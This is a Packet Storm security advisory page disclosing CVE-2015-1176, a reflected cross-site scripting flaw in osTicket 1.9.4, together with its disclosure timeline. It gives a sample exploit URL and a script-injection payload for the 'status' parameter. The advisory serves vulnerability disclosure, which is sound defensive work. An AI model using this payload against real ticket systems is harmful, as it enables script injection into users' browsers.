Lucene search

K
packetstormSudhanshu ChauhanPACKETSTORM:130057
HistoryJan 22, 2015 - 12:00 a.m.

osTicket 1.9.4 Cross Site Scripting

2015-01-2200:00:00
Sudhanshu Chauhan
packetstormsecurity.com
35

0.005 Low

EPSS

Percentile

75.6%

`CVE-2015-1176-xss-osticket  
  
  
Information  
----------------  
Advisory by Octogence.  
Name: Reflected XSS Vulnerability in osTicket Ticket system  
Affected Software : osTicket  
Affected Versions: 1.9.4 and possibly below  
Vendor Homepage : http://osticket.com/  
Vulnerability Type : Cross-site Scripting  
Severity : High  
CVE ID: CVE-2015-1176  
  
Impact  
----------  
An attacker can craft a URL with malicious JavaScript code which  
executes in the browser.  
  
Technical Details  
-------------------------  
Sample URL:  
http://localhost/osticket/upload/scp/tickets.php?a=search&status=032ā€³><script>alert(1)<%2fscript>&uid=3  
  
Parameter:  
status  
  
Sample Payload:  
ā€œ><script>alert(1)</script>  
  
For more information on cross-site scripting vulnerabilities read the  
following article:  
  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
  
Advisory Timeline (mm/dd/yyyy)  
-----------------------------------------------  
12/15/2014 ā€“ Reported  
01/02/2015 ā€“ Vulnerability Fixed  
01/18/2015 ā€“ Advisory Released  
  
  
--   
Regards  
Sudhanshu  
  
Octogence Tech Solutions  
Noida, India  
Mobile | +91-9971658929  
Website| www.octogence.com  
`

0.005 Low

EPSS

Percentile

75.6%

Related for PACKETSTORM:130057